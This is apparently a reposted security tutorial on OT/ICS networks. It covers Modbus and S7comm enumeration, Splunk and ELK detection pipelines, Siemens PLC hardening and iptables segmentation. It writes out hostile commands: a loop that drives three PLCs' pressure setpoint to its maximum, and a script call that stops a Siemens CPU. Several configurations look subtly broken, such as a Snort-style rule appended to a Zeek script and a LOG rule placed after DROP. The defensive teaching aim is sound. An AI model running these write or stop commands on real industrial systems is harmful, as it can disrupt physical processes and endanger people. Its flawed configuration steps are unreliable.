Listen to this Post

Introduction:
Operational Technology (OT) environments—from water facilities to railway controls—often run on flat, unsegmented networks using legacy protocols like Modbus TCP and Siemens S7comm. Security teams struggle because OT is not documentation; it is live system behavior under load, and Labshock’s grouped labs reveal that identical protocol exposure (e.g., Modbus TCP on 7–9 services) persists across industries unless you implement proper telemetry, SIEM, or segmentation.
Learning Objectives:
- Identify and enumerate vulnerable OT services (Modbus, S7comm, Syslog) using open-source tools.
- Implement detection rules for OT/ICS traffic anomalies via Splunk or ELK stack.
- Apply network segmentation and DMZ architecture to mitigate lateral movement in flat OT networks.
You Should Know:
- Enumerating Modbus TCP Services on a Flat OT Network
In flat OT networks (like Oilsprings Air or Eastwater Facility), critical devices are directly reachable. Attackers scan for port 502 (Modbus) to read/write PLC registers. Below is a step‑by‑step guide to perform safe, authorized enumeration.
Step‑by‑step guide – Linux (Kali/Ubuntu):
Install Modbus tools
sudo apt update && sudo apt install nmap modbus-cli python3-pip -y
pip3 install pymodbus
Scan for Modbus TCP services on a /24 subnet (replace with lab IP range)
nmap -p 502 --open -sV 192.168.1.0/24
Read coil status from a discovered PLC (example IP)
modpoll -m tcp -a 1 -r 100 -c 10 192.168.1.100
Python script to read holding registers
python3 -c "from pymodbus.client import ModbusTcpClient; client = ModbusTcpClient('192.168.1.100'); client.connect(); print(client.read_holding_registers(0, 10).registers)"
Windows alternative (using PowerShell and free tool):
Download Modbus scanner (e.g., ModbusPal or use PowerSploit) Invoke-WebRequest -Uri "https://github.com/wojciechmalota/ModbusTCP-scanner/raw/main/ModbusScanner.exe" -OutFile "ModbusScanner.exe" .\ModbusScanner.exe 192.168.1.0/24 502
What this does: Identifies live PLCs, SCADA HMIs, and RTUs without authentication. Use it only in isolated labs like Labshock’s Utility Works I to baseline “normal” behavior before adding IDS rules.
- Ingesting OT Telemetry into Splunk for Detection Validation
Oilsprings Splunk adds a SIEM layer to the same flat network, converting Modbus TCP + Syslog into actionable alerts. Here’s how to replicate that pipeline.
Step‑by‑step guide – Linux (Ubuntu with Splunk Universal Forwarder):
Install Splunk Universal Forwarder wget -O splunkforwarder.deb 'https://www.splunk.com/bin/splunk/DownloadActivityServlet?architecture=x86_64&platform=linux&version=9.0.0&product=universalforwarder&filename=splunkforwarder-9.0.0-xyz-linux-2.6-amd64.deb' sudo dpkg -i splunkforwarder.deb Configure inputs to monitor Modbus syslog (assuming PLCs log to /var/log/syslog) echo -e "[monitor:///var/log/syslog]\nindex=ot_telemetry\nsourcetype=modbus_tcp" | sudo tee -a /opt/splunkforwarder/etc/system/local/inputs.conf Restart forwarder sudo /opt/splunkforwarder/bin/splunk restart On Splunk server: create alert for "Write Single Coil" (function code 5) – indicative of tampering index=ot_telemetry sourcetype=modbus_tcp "function_code=5" | stats count by src_ip
Windows (using nxlog to forward Windows Event Logs to Splunk):
Install nxlog community edition Invoke-WebRequest -Uri "https://nxlog.co/downloads/nxlog-ce/nxlog-ce-3.0.2272.msi" -OutFile "nxlog.msi" msiexec /i nxlog.msi /quiet Edit C:\Program Files\nxlog\conf\nxlog.conf – add Modbus parser (custom) Then restart service: net stop nxlog && net start nxlog
Pro tip: In Oilsprings Splunk, the baseline Modbus TCP behavior includes only read requests (function code 3). Any write request (code 5, 6, 15, 16) triggers a critical alert. Validate this by simulating a write with modpoll -m tcp -a 1 -r 100 -v 1 192.168.1.100.
- Building OT Dashboards with ELK Stack (Oilsprings ELK)
ELK (Elasticsearch, Logstash, Kibana) gives you open‑source observability. Use pipelines to parse Modbus TCP traffic and Syslog for real‑time dashboards.
Step‑by‑step guide – Debian/Ubuntu:
Install Elastic stack (7.x)
wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
sudo apt-get install apt-transport-https
echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee /etc/apt/sources.list.d/elastic-7.x.list
sudo apt update && sudo apt install elasticsearch logstash kibana -y
Logstash pipeline for Modbus TCP (parses pcap or syslog)
cat <<EOF | sudo tee /etc/logstash/conf.d/modbus.conf
input { syslog { port => 5514 } }
filter {
grok { match => { "message" => "Modbus transaction: %{DATA:function_code} unit_id=%{NUMBER:unit_id}" } }
}
output { elasticsearch { hosts => ["localhost:9200"] } }
EOF
sudo systemctl restart logstash
In Kibana: create a visualization showing “function code” pie chart – watch for writes.
Command to generate test syslog messages: `logger -n 127.0.0.1 -P 5514 “Modbus transaction: function_code=6 unit_id=1″` (function code 6 = write single register).
- Hardening a Siemens S7comm Environment (Spindlespeed CNC Example)
Siemens S7comm (port 102) has known vulnerabilities (CVE‑2011‑3331, S7‑1500 CPU crash). For CNC machining systems like Spindlespeed, precision and uptime are critical. Apply these mitigations.
Step‑by‑step – Siemens PLC configuration (TIA Portal):
- Enable “Protection level: HMI access only” – blocks PC‑based writing.
- Set “PG/PC communication” to “Permit only HTTPS” (disables direct S7comm write).
- Use a firewall rule to allow only specific engineering workstations to port 102.
Linux command to test for S7comm vulnerability (using s7‑go‑check):
git clone https://github.com/atimorin/scada-tools && cd scada-tools/s7 python3 s7_300_enum.py 192.168.10.200 enumerate CPU model and state To simulate an attack (only in lab): s7_300_write.py 192.168.10.200 0 1 0 (stop CPU)
Windows (using Snap7 library):
Download Snap7 for Windows and run the "cpuinfo" example .\snap7_examples\cpuinfo.exe 192.168.10.200 0 1 If you see "CPU state: STOP", the PLC is vulnerable to unauthorized stop commands.
Mitigation: Deploy a industrial IDS like Zeek with S7 plugin. Rule example – alert on s7.cpu_stop:
Install Zeek sudo apt install zeek -y Custom rule: echo 'alert s7.cpu_stop (msg:"PLC STOP command"; sid:1000001;)' >> /usr/local/zeek/share/zeek/site/local.zeek zeekctl deploy
5. Segmenting with DMZ Architecture (Railroad North Example)
Railroad North’s master‑slave plus DMZ architecture reduces attack surface. A DMZ isolates corporate IT from OT control networks.
Step‑by‑step – Linux as a DMZ gateway (using iptables):
Interface eth0 = corporate (dangerous), eth1 = OT (Modbus subnet 10.0.0.0/24) Allow only Modbus TCP (502) and Syslog (514) from corporate to OT, block everything else iptables -A FORWARD -i eth0 -o eth1 -p tcp --dport 502 -j ACCEPT iptables -A FORWARD -i eth0 -o eth1 -p udp --dport 514 -j ACCEPT iptables -A FORWARD -i eth0 -o eth1 -j DROP Log dropped packets for monitoring iptables -A FORWARD -i eth0 -o eth1 -j LOG --log-prefix "DMZ_BLOCK: " Windows equivalent using New-NetFirewallRule (on a Windows Server acting as gateway) New-NetFirewallRule -DisplayName "Allow Modbus to OT" -Direction Inbound -Protocol TCP -LocalPort 502 -RemoteAddress 10.0.0.0/24 -Action Allow
Verification: From corporate machine, try `ping 10.0.0.5` (should fail) and `nc -zv 10.0.0.5 502` (should succeed). This mimics Railroad North’s “different visibility” – you see only approved services.
- Simulating a Gasflow Terminal Attack with Multi‑PLC Coordination
Gasflow Terminal runs multiple Siemens S7 PLCs under high load. Attackers could issue coordinated writes to destabilize pressure. Use Modbus/TCP over S7 gateway to test.
Step‑by‑step – Attack simulation (authorized lab only):
Assuming each PLC at 192.168.100.10, .11, .12 – all share a common holding register for pressure setpoint (address 40001)
for plc in 192.168.100.{10,11,12}; do
modpoll -m tcp -a 1 -r 40001 -v 65535 $plc Max pressure
done
This causes a cascade – in a real turbine system, it would trigger emergency shutdown.
Defensive command – enable “Security Level” in Siemens PLC: block remote writes via TIA Portal or use a python honeypot to detect scanning
sudo python3 -m pip install conpot
conpot --template default Honeypot that logs all Modbus/S7 requests
Detection rule for Syslog (on Gasflow Terminal’s logging host):
`grep “Write Multiple Registers” /var/log/syslog | awk ‘{print $1,$2,$5}’ | sort | uniq -c` – more than 3 writes in 10 seconds indicates an attack.
What Undercode Say:
- OT security is about live behavior, not static documentation – every lab in Labshock’s portfolio shows that the same Modbus exposures recur until you add telemetry and segmentation.
- Using SIEM (Splunk) or open-source ELK transforms raw Modbus noise into actionable detections, but only if you baseline “normal” function codes and alert on writes.
- Network segmentation (DMZ) and protocol‑aware firewalls are the most cost‑effective mitigations for flat OT networks like Oilsprings Air or Rotorbay Assembly.
Expected Output:
- Enumeration of 6–9 OT services (Modbus TCP, S7comm, Syslog) using nmap and modpoll.
- SIEM ingestion pipeline with Splunk forwarder and ELK logstash configurations.
- Mitigation steps including iptables DMZ rules, Siemens PLC protection levels, and Zeek IDS signatures.
Prediction:
Within two years, AI-driven anomaly detection will automatically learn the “normal” baseline of each OT process flow (e.g., register changes in Rotorbay’s production line) and block any deviation without human rules. However, legacy protocols like Modbus TCP and S7comm will remain widely deployed because replacing them disrupts operations. Consequently, we will see a rise in “virtual patching” – network‑level deep packet inspection that injects access controls on the fly, combined with mandatory segmentation enforced by cloud‑managed industrial firewalls. Labshock’s grouped lab approach will become the industry standard for certifying OT defenders, shifting from theory to live, load‑tested behaviors.
▶️ Related Video (74% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: All Labs – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


